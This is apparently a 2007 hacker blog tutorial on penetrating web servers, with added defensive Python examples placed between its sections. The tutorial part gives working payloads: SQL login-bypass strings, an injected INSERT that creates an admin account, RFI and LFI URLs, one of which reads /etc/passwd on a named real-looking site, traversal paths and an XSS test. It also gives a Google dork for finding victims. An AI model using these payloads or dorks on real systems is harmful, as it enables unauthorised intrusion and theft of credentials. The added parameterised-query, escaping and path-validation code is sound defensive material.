Tuesday, June 12, 2007
THE MOST USED METHODS TO PENETRATE A WEBSERVER.
* This tutorial is intended to increase your knowledge of internet security and of how web servers are penetrated;
* This document was prepared for informational purposes only;
* This document may not be reproduced without the author's permission.
Respects to my friend, flow-flow, for the German paper on the same subject.
I am here to exploit, to learn how things work. I've always asked questions and I have always searched for more than two hours. My crime is one of curiosity; I exploit what you dream of, I am over ambition and will. If you want to enter this world, break away, forget all you have learned from the others, the ignorant, those without interest, and learn to do exactly what you want with your knowledge.
I have been in the underground for 5 years; my first contact with a computer was 10 years ago, and I was fascinated from the first moment by the infinite possibilities it opens for a man.
You don't know me, so don't judge me! ONLY GOD can judge me!
If you feel something reading these lines, that means I am talking to you; if not, look away.
We have to help each other; hacking cannot be defined, hacking is a state of mind.
I thank all of you who helped and help me!
This is my manifesto !
The tutorial is structured in two directions: vulnerabilities and fixing them.
A lot of people make tutorials but they just talk; I am going to really explain a few methods as we go. I don't consider myself a specialist, but I know what I am talking about.
SQL injection is the method that exploits errors in application code: it lets the attacker inject SQL commands through login forms and feedback forms in order to gain access to sensitive information in the database. SQL injection works because the input forms allow SQL expressions to reach the database directly.
The attacker builds SQL fragments that manipulate the commands sent to the database and so gains access. The most used variant is the SQL login bypass, in which we inject into the login and password fields.
Example: ' OR 1=1--
URL scheme: http://site.com/index.php?id=0 ' OR 1=1--
Other commands: admin'--
' OR 0=0--
' HI OR 1=1--
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
We look for vulnerable sites with the following google-dorks:
How to defend yourself from such attacks.
The system must be checked for every sort of vulnerability: the code needs to be bug free, and the applications and everything else that makes up the infrastructure must be sanitized.
At each change of a component a web security audit must be done.
There is no point in my going into more detail. If you don't have a complex infrastructure to take care of, it isn't worth getting more involved than you already are.
SQL Injection table modification
Here’s what we are going to do.
We are going to create an account with special rights. This method involves 3 steps: generating an error that must be understood (it is important to see a certain table name), and after that injecting commands to create a new privileged account.
In the username field: ' HAVING 1=1
The error must contain a table name: user_member.id.
Then inject the commands: 'UNION SELECT * FROM user_member WHERE USER_ID='ADMIN' GROUP BY USER_ID HAVING 1=1;--
After the error is generated we try:
'INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_DATE) VALUES('HACKER','HACKED','HCKED',GETDATE());--
Now if everything went well we should be able to log in with:
-user : hacker
-password : hacked
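Both SQL sections above come down to one coding mistake: the form fields are pasted into the SQL text. As an added example (Python with an in-memory SQLite table standing in for the site's user_member table; this is not code from the tutorial, and the table contents are constructed), here is the login check in its two forms. login_vulnerable concatenates the fields as the tutorial's target does, so the ' OR 1=1-- bypass succeeds and a ' HAVING 1=1 input produces a raw database error of the kind the table-modification method reads. login_hardened binds the fields as parameters and keeps any database error message off the page, which is what "sanitized code" in the fixing section amounts to.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's user table, kept in memory so the example runs offline.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_member (user_name TEXT, login_id TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO user_member VALUES ('Site Admin', 'admin', 'constructed-secret', 'admin')")
    return conn

def login_vulnerable(conn, login_id, password):
    """The pattern the tutorial exploits: the form fields become part of the SQL text,
    so a quote in the input closes the string and the remainder is parsed as SQL."""
    query = ("SELECT login_id, role FROM user_member WHERE login_id = '" + login_id
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()

def db_error_shown(conn, login_id, password):
    """What a page that echoes the database error reveals for an input such as ' HAVING 1=1.
    SQLite answers with a syntax error; the tutorial's target leaked the user_member
    table name through the same channel. Returns the error text, or None if no error."""
    try:
        login_vulnerable(conn, login_id, password)
    except sqlite3.Error as exc:
        return str(exc)
    return None

def login_hardened(conn, login_id, password, error_log):
    """Bound parameters plus a generic failure message. The driver sends the input as
    values, never as SQL text, and a database error is written to the server-side log
    instead of being shown to the client, so no table name reaches the attacker."""
    try:
        row = conn.execute(
            "SELECT login_id, role FROM user_member WHERE login_id = ? AND password = ?",
            (login_id, password),
        ).fetchone()
    except sqlite3.Error as exc:
        error_log.append(str(exc))  # detail stays on the server
        return {"ok": False, "message": "login failed"}
    if row is None:
        return {"ok": False, "message": "login failed"}
    return {"ok": True, "login_id": row[0], "role": row[1]}

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, ' OR 1=1-- :", login_vulnerable(db, "' OR 1=1--", "anything"))
    print("vulnerable, ' HAVING 1=1 :", db_error_shown(db, "' HAVING 1=1", "x"))
    print("hardened,   ' OR 1=1-- :", login_hardened(db, "' OR 1=1--", "anything", []))
```

With parameters bound, the ' HAVING 1=1 input is compared as a literal login name and simply fails to match, so there is no error to read. On a real DBMS the account the site connects with should also lack INSERT rights on the user table, so the account-creation step in the tutorial fails even if some injection point remains.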
REMOTE FILE INCLUSION
In this method what we actually want to do is upload a file, a shell emulator, onto the vulnerable web page. When the web site calls another page to be displayed, we build a URL scheme that makes it fetch the emulator, getting access to the entire server.
This method is much more than this; this is only one form of it, so read further and more tutorials.
Here are a couple of google-dorks to find vulnerable web sites:
inurl:"index.php?page="
We test on: http://site.com/director_vulnerabil.php?=http://google.com ; if Google opens inside the site's frame, then it is vulnerable.
LOCAL FILE INCLUSION
A code problem can have serious consequences; this method is similar to CGI exploitation. Let's say I have accessed the password file on the UNIX server. Simple, anyone can do this kind of stuff: after a scan of a site and a PoC, then "great hacker". This is lame stuff! Never use a scanner, unless you have to, or you are interested in a particular thing at the site.
At every vulnerability you have to understand the problem, the code that generates it and so on.
Here is an example of an error :
$page input is not sanitized.
The passwords are stored in hashed form, but you can try the brute-force method using a program such as Brutus; I will publish a Perl script soon. I searched for passwords of FTP accounts, for instance. It depends on your luck too.
URL scheme used : http://kleenrite.net/index.php?Tab=Renting&incFile=/etc/passwd
REMOTE ADMIN FILE DISCLOSURE
This one you try more "blind" in general, because we don't know for sure whether it will work every time.
Remote admin password disclosure: we try to access files from the inside.
URL scheme : http://www.site.com/files/uploaded/download.php?filename=download.php
I have posted a lot of examples on other sites where I found some serious info like passwords and so on. Here it isn't such a big deal.
CROSS SITE SCRIPTING
It is still being researched and some say it is the future; I am going to present how you can find this vulnerability and how you can exploit it, but as I said for RFI, you have to study seriously if you want to really understand.
More exactly, I'm going to refer to cookie stealing. For the test you proceed similarly to SQL injection: you look at forms and try to inject simple scripts. The result is an alert window with the text "xss"; good, now you know that you can try a more complex script. We will build a cookie stealer and I will show you how you can look for cookies directly from a URL scheme.
After we test it like so: <script>alert('XSS')</script> we do the following:
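The alert test above works because the page writes the form value back into its HTML unchanged. As an added example (Python, not code from the tutorial; the comment-rendering functions and the session_id value are constructed), here is the reflection beside its fix: output encoding with the standard-library html.escape turns the same input into harmless text, and the Set-Cookie header shows the HttpOnly attribute, which is what stops an injected script from reading the session cookie a cookie stealer is after.

```python
import html

def render_comment_vulnerable(comment):
    # The reflection the alert test finds: input is written into the page as-is,
    # so a <script> tag in it is parsed as markup and runs in the visitor's browser.
    return "<p>" + comment + "</p>"

def render_comment_escaped(comment):
    # Output encoding: <, >, &, " and ' become entities, so the same input is shown
    # as literal text and never reaches the HTML parser as a tag.
    return "<p>" + html.escape(comment, quote=True) + "</p>"

def session_cookie_header(session_id):
    # Cookie stealing relies on injected script reading document.cookie. HttpOnly keeps
    # the cookie out of reach of scripts; Secure keeps it off plaintext connections.
    # session_id is a constructed value supplied by the caller.
    return "Set-Cookie: session=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % session_id

def contains_markup(rendered):
    # Check used to show the difference: does the fragment inside the <p> wrapper
    # still carry angle brackets the browser would parse as a tag?
    inner = rendered[len("<p>"):-len("</p>")]
    return "<" in inner or ">" in inner

if __name__ == "__main__":
    payload = "<script>alert('XSS')</script>"   # the tutorial's test string
    print(render_comment_vulnerable(payload))
    print(render_comment_escaped(payload))
    print(session_cookie_header("constructed-session-id"))
```

Escaping belongs at the point where data is written into HTML, not at the input form: the same value may be stored and later rendered in several places, and each one needs the encoding that fits its context.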
NULL BYTE-CGI EXPLOITATION
CGI (the Common Gateway Interface) is found on web servers and controls how .cgi and .pl files are run. CGI scripts and folders are used for statistics, forms and database commands. The NULL byte is used in programming to mark the end of a string. The CGI page accesses other pages like so:
Here page2.html is shown, but if we modify it a little like so:
We just added a NULL byte, which terminates all the data in the URL after it. Now we do the following scheme:
Almost seems like LFI.
Directory Traversal is an HTTP exploit that allows the attacker to access folders inside the server and to execute commands from the server's root.
· Access Control Lists (ACLs)
· Root directory
These are two security mechanisms used on a server. With Access Control Lists the administrator puts limits on users and configures all the other functions. The root directory stops users from accessing files that contain sensitive data, like CMD on the Windows platform and the passwd file on Linux/UNIX.
http://site.com/show.asp?view=../../../../../Windows/system.ini . This URL scheme makes a request to the show.asp page on the server and sends the view parameter with the value ../../../../../Windows/system.ini.
../ means going one directory up.
Another scheme would be: http://site.com/scripts/..%5c../Windows/System32/
Hope this helps all of you; it's an easy intro to Web Application Security.
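The file-based methods in this tutorial (a URL in the include parameter for RFI, /etc/passwd for LFI, download.php?filename=download.php for source disclosure, the NULL byte terminator, and ../ or ..%5c for traversal) all reach the file system through one untrusted string, so one resolver on the server side answers all of them. This added example (Python, not code from the tutorial; UPLOAD_ROOT and the extension allowlist are constructed) shows the naive join the vulnerable scripts perform beside a resolver that applies each check in turn and refuses every scheme quoted above.

```python
import os
from urllib.parse import unquote, urlsplit

# Constructed: the only directory a download.php-style script may serve from, and the
# file types it exists to hand out. Script source (.php, .asp) is not a download, which
# is what the download.php?filename=download.php trick relies on.
UPLOAD_ROOT = "/srv/constructed-root/files/uploaded"
ALLOWED_DOWNLOAD_EXTENSIONS = {".pdf", ".zip", ".png", ".jpg"}

def resolve_download_vulnerable(root, requested):
    # What the vulnerable scripts effectively do: glue the parameter onto the base
    # directory and open it. Every URL scheme in the text passes through untouched.
    return root + "/" + requested

def resolve_download(root, requested):
    """Return the absolute path under `root` that `requested` may read, or None.
    Each check answers one of the methods described in the tutorial."""
    if not requested:
        return None
    # Remote file inclusion: a URL carries a scheme, a file name does not.
    if urlsplit(requested).scheme:
        return None
    # Decode once so encoded separators (..%5c) and encoded dots are examined in decoded form.
    decoded = unquote(requested)
    # NULL byte: truncates the string in C-based file APIs; no legitimate name contains one.
    if "\x00" in decoded:
        return None
    # IIS/Windows accept backslash as a separator, so normalise it before looking for "..".
    decoded = decoded.replace("\\", "/")
    # Absolute paths (/etc/passwd) and any ".." segment are refused outright.
    if decoded.startswith("/") or ".." in decoded.split("/"):
        return None
    real_root = os.path.realpath(root)
    full = os.path.realpath(os.path.join(real_root, decoded))
    # Containment: after dot and symlink resolution the path must still lie under the root.
    if os.path.commonpath([real_root, full]) != real_root:
        return None
    # File-type allowlist: only the extensions this endpoint is meant to serve.
    if os.path.splitext(full)[1].lower() not in ALLOWED_DOWNLOAD_EXTENSIONS:
        return None
    return full

if __name__ == "__main__":
    for value in ("report.pdf", "../../../../../Windows/system.ini",
                  "..%5c../Windows/System32/", "/etc/passwd", "page2.html%00",
                  "http://google.com", "download.php"):
        print("%-40s -> %s" % (value, resolve_download(UPLOAD_ROOT, value)))
```

For an include-by-name parameter such as index.php?page=, the stronger fix is to not take a path at all: map a small set of page names to fixed files in a dictionary and reject anything not in it.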
See u soon,